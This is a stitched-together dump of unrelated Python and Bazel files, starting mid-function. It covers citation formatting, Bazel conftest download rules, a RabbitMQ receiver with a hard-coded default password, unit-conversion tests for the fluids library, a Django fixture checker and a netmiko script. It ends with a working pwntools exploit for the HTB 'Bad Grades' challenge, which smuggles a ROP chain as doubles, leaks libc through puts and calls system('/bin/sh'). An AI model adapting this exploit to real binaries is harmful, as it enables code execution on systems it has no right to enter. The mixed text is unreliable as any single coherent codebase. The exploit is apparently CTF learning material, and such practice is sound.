Raises ------ ValueError If the item's aggregationType is not Journal. 
""" if self.aggregationType != 'Journal': raise ValueError('Only Journal articles supported.') # Basic information ris = f"TY - JOUR\nTI - {self.title}\nJO - {self.publicationName}"\ f"\nVL - {self.volume}\nDA - {self.coverDate}\n"\ f"PY - {self.coverDate[0:4]}\nSP - {self.pageRange}\n" # Authors for au in self.authors: ris += f'AU - {au.indexed_name}\n' # DOI if self.doi: ris += f'DO - {self.doi}\nUR - https://doi.org/{self.doi}\n' # Issue if self.issueIdentifier: ris += f'IS - {self.issueIdentifier}\n' ris += 'ER - \n\n' return ris def _get_org(aff): """Auxiliary function to extract org information from affiliation for authorgroup. """ try: org = aff['organization'] if not isinstance(org, str): try: org = org['$'] except TypeError: # Multiple names given org = ', '.join([d['$'] for d in org if d]) except KeyError: # Author group w/o affiliation org = None return org def _list_authors(lst): """Format a list of authors (Surname, Firstname and Firstname Surname).""" authors = ', '.join([' '.join([a.given_name, a.surname]) for a in lst[0:-1]]) authors += ' and ' + ' '.join([lst[-1].given_name, lst[-1].surname]) return authors def _parse_pages(self, unicode=False): """Auxiliary function to parse and format page range of a document.""" if self.pageRange: pages = f'pp. {self.pageRange}' elif self.startingPage: pages = f'pp. {self.startingPage}-{self.endingPage}' else: pages = '(no pages found)' if unicode: pages = u'{}'.format(pages) return pages def _select_by_idtype(lst, id_type): """Auxiliary function to return items matching a special idtype.""" try: return [d['$'] for d in lst if d['@idtype'] == id_type][0] except IndexError: return None
nilq/baby-python
python
"""Repository macros for conftest""" load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") load(":platforms.bzl", "OS_ARCH") CONFTEST_VERSION = "0.23.0" _BUILD_FILE_CONTENT = """ exports_files(["conftest"]) """ SHA256S = { "conftest_0.23.0_Darwin_x86_64.tar.gz": "863d2eb3f9074c064e5fc0f81946fb7a04325dd72168468c83a99d139337bafc", "conftest_0.23.0_Linux_x86_64.tar.gz": "60b9c2f2338514b9ec3185051ff29b3aa83c753901810b3a396789c33fd520de", "conftest_0.23.0_Linux_arm64.tar.gz": "852668ffc20bcecbb7ab4862e911b4f35e37d6df1ead89ee1d35901ce03c9e08", "conftest_0.23.0_Windows_x86_64.zip": "d7aef1c7a91800a7212eb87d6d3b83a0b931a7b1dc03a346f220a1fd04f4056d", } def conftest_rules_dependencies(): for os, arch in OS_ARCH: archive_format = "zip" if os == "windows" else "tar.gz" archive_name = "conftest_{v}_{os}_{arch}.{format}".format( v = CONFTEST_VERSION, os = os.capitalize(), arch = arch, format = archive_format, ) http_archive( name = "conftest_{os}_{arch}".format(os = os, arch = arch), sha256 = SHA256S[archive_name], urls = [ "https://github.com/open-policy-agent/conftest/releases/download/v{}/{}".format(CONFTEST_VERSION, archive_name), ], build_file_content = _BUILD_FILE_CONTENT, )
nilq/baby-python
python
from skipper_lib.events.event_receiver import EventReceiver
from app.data_service import DataService
import os


def main():
    # os.getenv returns a string when the variable is set, so normalize the
    # port to an int whether it comes from the environment or the default.
    event_receiver = EventReceiver(username=os.getenv('RABBITMQ_USER', 'skipper'),
                                   password=os.getenv('RABBITMQ_PASSWORD', 'welcome1'),
                                   host=os.getenv('RABBITMQ_HOST', '127.0.0.1'),
                                   port=int(os.getenv('RABBITMQ_PORT', 5672)),
                                   queue_name=os.getenv('QUEUE_NAME', 'skipper_data'),
                                   service=DataService,
                                   service_name=os.getenv('SERVICE_NAME', 'data'),
                                   logger=os.getenv('LOGGER_RECEIVER_URL',
                                                    'http://127.0.0.1:5001/api/v1/skipper/logger/log_receiver'))


if __name__ == "__main__":
    main()
nilq/baby-python
python
# helpers.py import datetime # import whois import json import socket import time import traceback from random import choice from threading import Thread from urllib.parse import quote as urlencode from urllib.parse import unquote import pytz import requests import socks import subprocess from urllib.error import URLError from pytrends.request import TrendReq LOG_TRACE = True TOTAL_WORLD_CAP_TRILLIONS_USD = 116.78 # Source: https://www.statista.com/statistics/274490/global-value-of-share-holdings-since-2000/ def get_pretty_json_string(value): return json.dumps(value, indent=4, sort_keys=True, ensure_ascii=False) def shell( shell_command_line: str, print_stdout_stderr_bool: bool = True, capture_streams_bool: bool = True, as_text: bool = True, shell_executable_str: str = "bash", command_line_flag_str: str = "-c" ): result = subprocess.run( [shell_executable_str, command_line_flag_str, shell_command_line], stdout = subprocess.PIPE, stderr = subprocess.PIPE #capture_output=capture_streams_bool, text=as_text # py3.7+ ) if print_stdout_stderr_bool: try: print(result.stdout.decode('utf-8')) except KeyboardInterrupt: raise except: traceback.print_exc() try: print(result.stderr.decode('utf-8')) except KeyboardInterrupt: raise except: traceback.print_exc() return result
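

if __name__ == "__main__":
    # Minimal self-check for the helpers above (a sketch; assumes a POSIX
    # shell with `echo` available).
    result = shell("echo hello")
    print("exit status:", result.returncode)
    print(get_pretty_json_string({"shell_ok": result.returncode == 0}))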
nilq/baby-python
python
HELPER_SETTINGS = { "TIME_ZONE": "America/Chicago", "INSTALLED_APPS": [ "djangocms_text_ckeditor", "djangocms_versioning", "djangocms_versioning.test_utils.extensions", "djangocms_versioning.test_utils.polls", "djangocms_versioning.test_utils.blogpost", "djangocms_versioning.test_utils.text", "djangocms_versioning.test_utils.people", "djangocms_versioning.test_utils.unversioned_editable_app", ], "MIGRATION_MODULES": { "auth": None, "cms": None, "menus": None, "djangocms_versioning": None, }, "CMS_PERMISSION": True, "LANGUAGES": ( ("en", "English"), ("de", "German"), ("fr", "French"), ("it", "Italiano"), ), "CMS_LANGUAGES": { 1: [ {"code": "en", "name": "English", "fallbacks": ["de", "fr"]}, { "code": "de", "name": "Deutsche", "fallbacks": ["en"], # FOR TESTING DO NOT ADD 'fr' HERE }, { "code": "fr", "name": "Française", "fallbacks": ["en"], # FOR TESTING DO NOT ADD 'de' HERE }, { "code": "it", "name": "Italiano", "fallbacks": ["fr"], # FOR TESTING, LEAVE AS ONLY 'fr' }, ] }, "PARLER_ENABLE_CACHING": False, "LANGUAGE_CODE": "en", } def run(): from djangocms_helper import runner runner.cms("djangocms_versioning", extra_args=[]) if __name__ == "__main__": run()
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- """ script to open directory in current window manager """ import utool as ut if __name__ == '__main__': import sys if len(sys.argv) == 2: path = sys.argv[1] else: path = None ut.assertpath(path) if ut.checkpath(path, verbose=True): ut.view_directory(path) # F:\\data\\work\\PZ_MTEST\\_ibsdb\\
nilq/baby-python
python
# -*- coding: utf-8 -*- '''Chemical Engineering Design Library (ChEDL). Utilities for process modeling. Copyright (C) 2017 Caleb Bell <Caleb.Andrew.Bell@gmail.com> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.''' from __future__ import division import types from fluids.numerics import assert_close, assert_close1d, assert_close2d import pytest import fluids from fluids.units import * from fluids.units import kwargs_to_args def test_kwargs_to_args(): sig = ['rho', 'mu', 'nu'] args = (1,) kwargs = {'mu': 2.2} assert [1, 2.2, None] == kwargs_to_args(args, kwargs, sig) kwargs = {'nu': 2.2} assert [1, None, 2.2] == kwargs_to_args(args, kwargs, sig) assert [12.2, 2.2, 5.5] == kwargs_to_args(tuple(), {'mu': 2.2, 'nu': 5.5, 'rho': 12.2}, sig) assert [None, None, None] == kwargs_to_args(tuple(), {}, sig) assert [12.2, 2.2, 5.5] == kwargs_to_args((12.2, 2.2, 5.5), {}, sig) def assert_pint_allclose(value, magnitude, units, rtol=1e-7, atol=0): assert_close(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def assert_pint_allclose1d(value, magnitude, units, rtol=1e-7, atol=0): assert_close1d(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def assert_pint_allclose2d(value, magnitude, units, rtol=1e-7, atol=0): assert_close2d(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def test_in_right_units(): assert u.default_system == 'mks' def test_nondimensional_reduction(): Re = 171.8865229090909 *u.meter * u.pound / u.centipoise / u.foot ** 2 / u.second eD = 0.0005937067088858105*u.inch/u.meter assert_close(friction_factor(Re, eD).magnitude, 0.012301598061848239) def test_convert_input(): from fluids.units import convert_input ans = convert_input(5, 'm', u, False) assert ans == 5 with pytest.raises(Exception): convert_input(5, 'm', u, True) def test_sample_cases(): Re = Reynolds(V=3.5*u.m/u.s, D=2*u.m, rho=997.1*u.kg/u.m**3, mu=1E-3*u.Pa*u.s) assert_close(Re.to_base_units().magnitude, 6979700.0) assert dict(Re.dimensionality) == {} # vs = hwm93(5E5*u.m, 45*u.degrees, 50*u.degrees, 365*u.day) # vs_known = [-73.00312042236328, 0.1485661268234253] # for v_known, v_calc in zip(vs_known, vs): # assert_close(v_known, v_calc.to_base_units().magnitude) # assert dict(v_calc.dimensionality) == {u'[length]': 1.0, 
u'[time]': -1.0} A = API520_A_g(m=24270*u.kg/u.hour, T=348.*u.K, Z=0.90, MW=51.*u.g/u.mol, k=1.11, P1=670*u.kPa, Kb=1, Kc=1) assert_close(A.to_base_units().magnitude, 0.00369904606468) assert dict(A.dimensionality) == {u'[length]': 2.0} T = T_critical_flow(473*u.K, 1.289) assert_close(T.to_base_units().magnitude, 413.280908694) assert dict(T.dimensionality) == {u'[temperature]': 1.0} T2 = T_critical_flow(473*u.K, 1.289*u.dimensionless) assert T == T2 with pytest.raises(Exception): T_critical_flow(473, 1.289) with pytest.raises(Exception): T_critical_flow(473*u.m, 1.289) # boolean P1 = 8*u.bar + 1*u.atm P2 = 1*u.atm assert True == is_critical_flow(P1, P2, k=1.4*u.dimensionless) A = size_control_valve_g(T=433.*u.K, MW=44.01*u.g/u.mol, mu=1.4665E-4*u.Pa*u.s, gamma=1.30, Z=0.988, P1=680*u.kPa, P2=310*u.kPa, Q=38/36.*u.m**3/u.s, D1=0.08*u.m, D2=0.1*u.m, d=0.05*u.m, FL=0.85, Fd=0.42, xT=0.60) assert_close(A.to_base_units().magnitude, 0.0201629570705307) assert dict(A.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} A = API520_round_size(A=1E-4*u.m**2) assert_close(A.to_base_units().magnitude, 0.00012645136) assert dict(A.dimensionality) == {u'[length]': 2.0} SS = specific_speed(0.0402*u.m**3/u.s, 100*u.m, 3550*u.rpm) assert_close(SS.to_base_units().magnitude, 2.3570565251512066) assert dict(SS.dimensionality) == {u'[length]': 0.75, u'[time]': -1.5} v = Geldart_Ling(1.*u.kg/u.s, 1.2*u.kg/u.m**3, 0.1*u.m, 2E-5*u.Pa*u.s) assert_close(v.to_base_units().magnitude, 7.467495862402707) assert dict(v.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} s = speed_synchronous(50*u.Hz, poles=12) assert_close(s.to_base_units().magnitude, 157.07963267948966) assert dict(s.dimensionality) == {u'[time]': -1.0} t = t_from_gauge(.2, False, 'AWG') assert_close(t.to_base_units().magnitude, 0.5165) assert dict(t.dimensionality) == {u'[length]': 1.0} dP = Robbins(G=2.03*u.kg/u.m**2/u.s, rhol=1000*u.kg/u.m**3, Fpd=24/u.ft, L=12.2*u.kg/u.m**2/u.s, rhog=1.1853*u.kg/u.m**3, mul=0.001*u.Pa*u.s, H=2*u.m) assert_close(dP.to_base_units().magnitude, 619.662459344 ) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} dP = dP_packed_bed(dp=8E-4*u.m, voidage=0.4, vs=1E-3*u.m/u.s, rho=1E3*u.kg/u.m**3, mu=1E-3*u.Pa*u.s) assert_close(dP.to_base_units().magnitude, 1438.28269588 ) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} dP = dP_packed_bed(dp=8E-4*u.m, voidage=0.4*u.dimensionless, vs=1E-3*u.m/u.s, rho=1E3*u.kg/u.m**3, mu=1E-3*u.Pa*u.s, Dt=0.01*u.m) assert_close(dP.to_base_units().magnitude, 1255.16256625) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} n = C_Chezy_to_n_Manning(26.15*u.m**0.5/u.s, Rh=5*u.m) assert_close(n.to_base_units().magnitude, 0.05000613713238358) assert dict(n.dimensionality) == {u'[length]': -0.3333333333333333, u'[time]': 1.0} Q = Q_weir_rectangular_SIA(0.2*u.m, 0.5*u.m, 1*u.m, 2*u.m) assert_close(Q.to_base_units().magnitude, 1.0408858453811165) assert dict(Q.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} t = agitator_time_homogeneous(D=36*.0254*u.m, N=56/60.*u.revolutions/u.second, P=957.*u.W, T=1.83*u.m, H=1.83*u.m, mu=0.018*u.Pa*u.s, rho=1020*u.kg/u.m**3, homogeneity=.995) assert_close(t.to_base_units().magnitude, 15.143198226374668) assert dict(t.dimensionality) == {u'[time]': 1.0} K = K_separator_Watkins(0.88*u.dimensionless, 985.4*u.kg/u.m**3, 1.3*u.kg/u.m**3, horizontal=True) assert_close(K.to_base_units().magnitude, 0.07951613600476297, rtol=1e-2) assert 
dict(K.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} A = current_ideal(V=120*u.V, P=1E4*u.W, PF=1, phase=1) assert_close(A.to_base_units().magnitude, 83.33333333333333) assert dict(A.dimensionality) == {u'[current]': 1.0} fd = friction_factor(Re=1E5, eD=1E-4) assert_close(fd.to_base_units().magnitude, 0.01851386607747165) assert dict(fd.dimensionality) == {} K = Cv_to_K(2.712*u.gallon/u.minute, .015*u.m) assert_close(K.to_base_units().magnitude, 14.719595348352552) assert dict(K.dimensionality) == {} Cv = K_to_Cv(16, .015*u.m) assert_close(Cv.to_base_units().magnitude, 0.0001641116865931214) assert dict(Cv.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} Cd = drag_sphere(200) assert_close(Cd.to_base_units().magnitude, 0.7682237950389874) assert dict(Cd.dimensionality) == {} V, D = integrate_drag_sphere(D=0.001*u.m, rhop=2200.*u.kg/u.m**3, rho=1.2*u.kg/u.m**3, mu=1.78E-5*u.Pa*u.s, t=0.5*u.s, V=30*u.m/u.s, distance=True) assert_close(V.to_base_units().magnitude, 9.686465044063436) assert dict(V.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} assert_close(D.to_base_units().magnitude, 7.829454643649386) assert dict(D.dimensionality) == {u'[length]': 1.0} Bo = Bond(1000*u.kg/u.m**3, 1.2*u.kg/u.m**3, .0589*u.N/u.m, 2*u.m) assert_close(Bo.to_base_units().magnitude, 665187.2339558573) assert dict(Bo.dimensionality) == {} head = head_from_P(P=98066.5*u.Pa, rho=1000*u.kg/u.m**3) assert_close(head.to_base_units().magnitude, 10.000000000000002) assert dict(head.dimensionality) == {u'[length]': 1.0} roughness = roughness_Farshad('Cr13, bare', 0.05*u.m) assert_close(roughness.to_base_units().magnitude, 5.3141677781137006e-05) assert dict(roughness.dimensionality) == {u'[length]': 1.0} def test_custom_wraps(): A = A_multiple_hole_cylinder(0.01*u.m, 0.1*u.m, [(0.005*u.m, 1)]) assert_close(A.to_base_units().magnitude, 0.004830198704894308) assert dict(A.dimensionality) == {u'[length]': 2.0} V = V_multiple_hole_cylinder(0.01*u.m, 0.1*u.m, [(0.005*u.m, 1)]) assert_close(V.to_base_units().magnitude, 5.890486225480862e-06) assert dict(V.dimensionality) == {u'[length]': 3.0} # custom compressible flow model wrappers functions = [Panhandle_A, Panhandle_B, Weymouth, Spitzglass_high, Oliphant, Fritzsche] values = [42.56082051195928, 42.35366178004172, 32.07729055913029, 29.42670246281681, 28.851535408143057, 39.421535157535565] for f, v in zip(functions, values): ans = f(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, Tavg=277.15*u.K) assert_pint_allclose(ans, v, {u'[length]': 3.0, u'[time]': -1.0}) ans = IGT(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, mu=1E-5*u.Pa*u.s, Tavg=277.15*u.K) assert_pint_allclose(ans, 48.92351786788815, {u'[length]': 3.0, u'[time]': -1.0}) ans = Muller(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, mu=1E-5*u.Pa*u.s, Tavg=277.15*u.K) assert_pint_allclose(ans, 60.45796698148659, {u'[length]': 3.0, u'[time]': -1.0}) nu = nu_mu_converter(rho=1000*u.kg/u.m**3, mu=1E-4*u.Pa*u.s) assert_pint_allclose(nu, 1E-7, {u'[length]': 2.0, u'[time]': -1.0}) mu = nu_mu_converter(rho=1000*u.kg/u.m**3, nu=1E-7*u.m**2/u.s) assert_pint_allclose(mu, 1E-4, {u'[time]': -1.0, u'[length]': -1.0, u'[mass]': 1.0}) SA = SA_tank(D=1.*u.m, L=0*u.m, sideA='ellipsoidal', sideA_a=2*u.m, sideB='ellipsoidal', sideB_a=2*u.m)[0] assert_pint_allclose(SA, 10.124375616183064, {u'[length]': 2.0}) SA, sideA_SA, sideB_SA, lateral_SA = SA_tank(D=1.*u.m, L=0*u.m, sideA='ellipsoidal', sideA_a=2*u.m, sideB='ellipsoidal', sideB_a=2*u.m) expect = 
[10.124375616183064, 5.062187808091532, 5.062187808091532, 0] for value, expected in zip([SA, sideA_SA, sideB_SA, lateral_SA], expect): assert_pint_allclose(value, expected, {u'[length]': 2.0}) m = isothermal_gas(rho=11.3*u.kg/u.m**3, fd=0.00185*u.dimensionless, P1=1E6*u.Pa, P2=9E5*u.Pa, L=1000*u.m, D=0.5*u.m) assert_pint_allclose(m, 145.484757, {u'[mass]': 1.0, u'[time]': -1.0}) def test_db_functions(): # dB ans = control_valve_noise_g_2011(m=2.22*u.kg/u.s, P1=1E6*u.Pa, P2=7.2E5*u.Pa, T1=450*u.K, rho=5.3*u.kg/u.m**3, gamma=1.22, MW=19.8*u.g/u.mol, Kv=77.85*u.m**3/u.hour, d=0.1*u.m, Di=0.2031*u.m, FL=None, FLP=0.792, FP=0.98, Fd=0.296, t_pipe=0.008*u.m, rho_pipe=8000.0*u.kg/u.m**3, c_pipe=5000.0*u.m/u.s, rho_air=1.293*u.kg/u.m**3, c_air=343.0*u.m/u.s, An=-3.8, Stp=0.2) # assert_pint_allclose(ans, 91.67702674629604, {}) def test_check_signatures(): from fluids.units import check_args_order for name in dir(fluids): obj = getattr(fluids, name) if isinstance(obj, types.FunctionType): if hasattr(obj, 'func_name') and obj.func_name == '<lambda>': continue # 2 if hasattr(obj, '__name__') and obj.__name__ == '<lambda>': continue # 3 check_args_order(obj) def test_differential_pressure_meter_solver(): m = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, P1=200000.0*u.Pa, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(m, 7.702338035732167, {'[mass]': 1, '[time]': -1}) P1 = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, m=m, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(P1, 200000, {'[length]': -1, '[mass]': 1, '[time]': -2}) P2 = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, P1=200000.0*u.Pa, m=m, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(P2, 183000, {'[length]': -1, '[mass]': 1, '[time]': -2}) D2 = differential_pressure_meter_solver(D=0.07366*u.m, m=m, P1=200000.0*u.Pa, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(D2, .05, {'[length]': 1}) def test_Tank_units_full(): T1 = TANK(L=3*u.m, D=150*u.cm, horizontal=True, sideA=None, sideB=None) # test all methods V = T1.V_from_h(0.1*u.m, 'full') assert_pint_allclose(V, 0.151783071377, u.m**3) h = T1.h_from_V(0.151783071377*u.m**3, method='brenth') assert_pint_allclose(h, 0.1, u.m) h = T1.h_from_V(0.151783071377*u.m**3, 'brenth') assert_pint_allclose(h, 0.1, u.m) # Check the table and approximations T1.set_table(dx=1*u.cm) assert 151 == len(T1.volumes) assert_pint_allclose1d(T1.heights[0:3], [0, 0.01, 0.02], u.m) T1.set_table(n=10) assert 10 == len(T1.volumes) T1.set_table(n=10*u.dimensionless) assert 10 == len(T1.volumes) T1.set_chebyshev_approximators(8, 8) T1.set_chebyshev_approximators(8*u.dimensionless, 8) T1.set_chebyshev_approximators(8, 8*u.dimensionless) assert 16 == len(T1.c_forward) assert 16 == len(T1.c_backward) # Check the properties assert_pint_allclose(T1.h_max, 1.5, u.m) assert_pint_allclose(T1.V_total, 5.301437602932776, u.m**3) assert_pint_allclose(T1.L_over_D, 2, u.dimensionless) assert_pint_allclose(T1.A_sideA, 1.76714586764, u.m**2) assert_pint_allclose(T1.A_sideB, 1.76714586764, u.m**2) assert_pint_allclose(T1.A_lateral, 14.1371669412, u.m**2) assert_pint_allclose(T1.A, 17.6714586764, u.m**2) def 
test_HelicalCoil_units():
    C2 = HelicalCoil(Do=30*u.cm, H=20*u.cm, pitch=5*u.cm, Dt=2*u.cm)
    C3 = HelicalCoil(2*u.cm, 30*u.cm, 5*u.cm, 20*u.cm)
    for C1 in [C2, C3]:
        assert_pint_allclose(C1.Dt, 0.02, u.m)
        assert_pint_allclose(C1.Do, 0.3, u.m)
        assert_pint_allclose(C1.Do_total, 0.32, u.m)
        assert_pint_allclose(C1.pitch, 0.05, u.m)
        assert_pint_allclose(C1.H, 0.2, u.m)
        assert_pint_allclose(C1.H_total, 0.22, u.m)
        assert_pint_allclose(C1.N, 4, u.dimensionless)
        assert_pint_allclose(C1.tube_circumference, 0.942477796077, u.m)
        assert_pint_allclose(C1.tube_length, 3.7752126215, u.m)
        assert_pint_allclose(C1.surface_area, 0.237203604749, u.m**2)
        assert_pint_allclose(C1.curvature, 0.06, u.dimensionless)
        assert_pint_allclose(C1.helix_angle, 0.0530019606897, u.radians)


def test_ATMOSPHERE_1976_units():
    five_km = ATMOSPHERE_1976(5000*u.m)
    assert_pint_allclose(five_km.T, 255.675543222, u.K)
    assert_pint_allclose(five_km.P, 54048.2861458, u.Pa)
    assert_pint_allclose(five_km.rho, 0.73642842078, u.kg/u.m**3)
    assert_pint_allclose(five_km.g, 9.79124107698, u.m/u.s**2)
    assert_pint_allclose(five_km.mu, 1.62824813536e-05, u.Pa*u.s)
    assert_pint_allclose(five_km.k, 0.0227319029514, u.W/u.K/u.m)
    assert_pint_allclose(five_km.v_sonic, 320.54551967, u.m/u.s)
    assert_pint_allclose(five_km.sonic_velocity(300*u.K), 347.220809082, u.m/u.s)

    # Test the staticmethod works alone
    assert_pint_allclose(ATMOSPHERE_1976.sonic_velocity(300*u.K), 347.220809082, u.m/u.s)

    # Check AttributeError is properly raised on __getstate__ for classes
    # as they now have a __getattr__ method
    import copy
    copy.copy(five_km)
    copy.deepcopy(five_km)


def test_ATMOSPHERE_NRLMSISE00():
    a = ATMOSPHERE_NRLMSISE00(Z=1E3*u.m, latitude=45*u.degrees, longitude=45*u.degrees, day=150*u.day)
    assert_pint_allclose(a.T, 285.544086062, u.K)
    assert_pint_allclose(a.rho, 1.10190620264, u.kg/u.m**3)
    assert_pint_allclose(a.O2_density, 4.80470350725e+24, u.count/u.m**3)
    assert_pint_allclose(a.day, 12960000, u.day)
nilq/baby-python
python
vel = float(input('Vehicle speed: '))
velMax = 80
taxa = 7.00
if vel > velMax:
    multa = (vel - velMax) * taxa
    print('You exceeded the speed limit! Pay a fine of R${:.2f}'.format(multa))
print('Drive safely!')
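
# Worked example (illustrative): with an input speed of 100 km/h against the
# 80 km/h limit and the R$7.00-per-km rate above, the fine is
# (100 - 80) * 7.00 = 140.00, printed as "R$140.00".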
nilq/baby-python
python
import csv from django.db import transaction from django_dynamic_fixture.django_helper import get_apps, get_models_of_an_app def color(color, string): return '\033[1;{}m{}\033[0m'.format(color, string) def white(string): return color('37', string) def red(string): return color('91', string) def green(string): return color('92', string) def ddf_check_models(application_labels=[], exclude_application_labels=[], csv_filename='ddf_compatibility_report.csv'): from django_dynamic_fixture import get succeeded = {} errors = {} for app_label in get_apps(application_labels, exclude_application_labels): models = get_models_of_an_app(app_label) for model_class in models: ref = '{}.{}'.format(app_label, model_class.__name__) try: with transaction.atomic(): get(model_class) succeeded[ref] = None except Exception as e: errors[ref] = '[{}] {}'.format(type(e), str(e)) console_report(succeeded, errors) if csv_filename: csv_report(succeeded, errors, filename=csv_filename) return succeeded, errors def console_report(succeeded, errors): print(green('\nModels that DDF can create using the default settings.\n')) for i, (ref, _) in enumerate(succeeded.items(), start=1): i = str(i).zfill(3) print(white('{}. {}: '.format(i, ref)) + green('succeeded')) print(red('\nModels that requires some customisation.\n')) for i, (ref, error) in enumerate(errors.items(), start=1): i = str(i).zfill(3) print(white('{}. {}: '.format(i, ref)) + red(error)) def csv_report(succeeded, errors, filename): with open(filename, 'w') as f: f.write(','.join(['#', 'Model', 'Succeeded', '\n'])) for i, (ref, _) in enumerate(succeeded.items(), start=1): f.write(','.join([str(i), ref, 'succeeded', '\n'])) f.write(','.join(['#', 'Model', 'Error', '\n'])) for i, (ref, error) in enumerate(errors.items(), start=1): f.write(','.join([str(i), ref, error, '\n']))
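
# Hypothetical usage sketch: ddf_check_models assumes a fully configured
# Django project (DJANGO_SETTINGS_MODULE set, apps loaded); the 'myapp'
# label below is a placeholder, not part of this module.
if __name__ == '__main__':
    import django
    django.setup()  # requires DJANGO_SETTINGS_MODULE in the environment
    succeeded, errors = ddf_check_models(application_labels=['myapp'])
    print(white('{} models succeeded, {} need customisation'.format(
        len(succeeded), len(errors))))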
nilq/baby-python
python
#!/usr/bin/env python import pathlib import yaml from rich import print from netmiko import ConnectHandler def read_yaml(filename): with open(filename) as f: return yaml.safe_load(f) if __name__ == "__main__": # Load the .netmiko.yml file netmiko_yml = pathlib.PosixPath("~/.netmiko.yml") netmiko_yml = netmiko_yml.expanduser() my_devices = read_yaml(netmiko_yml) print() for device_name, device_dict in my_devices.items(): # Skip the groups if isinstance(device_dict, list): continue print(f"Connecting to -> {device_name}") with ConnectHandler(**device_dict) as nc: print(nc.find_prompt()) print() print() print()
nilq/baby-python
python
# HTB - Bad Grades from pwn import * import struct p = process("./grades") # gdb.attach(p, "b *0x0401106") def make_double(address): val = p64(address).hex() return str(struct.unpack("d", bytes.fromhex(val))[0]) elf = ELF("./grades") libc = ELF("./libc.so.6") rop = ROP(elf) rop2 = ROP(libc) p.recvuntil(b'> ') p.sendline(b'2') p.recvuntil(b'Number of grades:') popRdi = rop.find_gadget(["pop rdi"])[0] puts_got = elf.got["puts"] puts_plt = elf.plt["puts"] main = 0x401108 p.sendline(b'39') for i in range(35): p.recvuntil(b']:') p.sendline(b'.') p.recvuntil(b']:') p.sendline(make_double(popRdi)) p.recvuntil(b']:') p.sendline(make_double(puts_got)) p.recvuntil(b']:') p.sendline(make_double(puts_plt)) p.recvuntil(b']:') p.sendline(make_double(main)) p.recvuntil(b'\n') leak = u64(p.recvuntil(b'\n').strip().ljust(8, b'\x00')) print(hex(leak), hex(libc.symbols["puts"])) libc.address = leak - libc.symbols["puts"] log.info("libc rebased to: " + hex(libc.address)) p.recvuntil(b'> ') p.sendline(b'2') p.recvuntil(b'Number of grades:') p.sendline(b'39') for i in range(35): p.recvuntil(b']:') p.sendline(b'.') ret = rop2.find_gadget(["ret"])[0] popRdi = rop2.find_gadget(["pop rdi", "ret"])[0] system = libc.symbols["system"] sh = next(libc.search(b'/bin/sh\x00')) p.recvuntil(b']:') p.sendline(make_double(ret)) p.recvuntil(b']:') p.sendline(make_double(popRdi)) p.recvuntil(b']:') p.sendline(make_double(sh)) p.recvuntil(b']:') p.sendline(make_double(system)) p.interactive()
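
# Sanity check for the double-encoding trick used throughout this exploit:
# on the little-endian x86-64 target assumed here, packing an address with
# p64, reinterpreting the raw bytes as an IEEE-754 double, and re-packing
# that double must reproduce the address bit-for-bit. (Illustrative
# self-test; it only runs once the interactive session ends.)
addr = 0x401108
assert struct.unpack("<Q", struct.pack("<d", float(make_double(addr))))[0] == addr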
nilq/baby-python
python
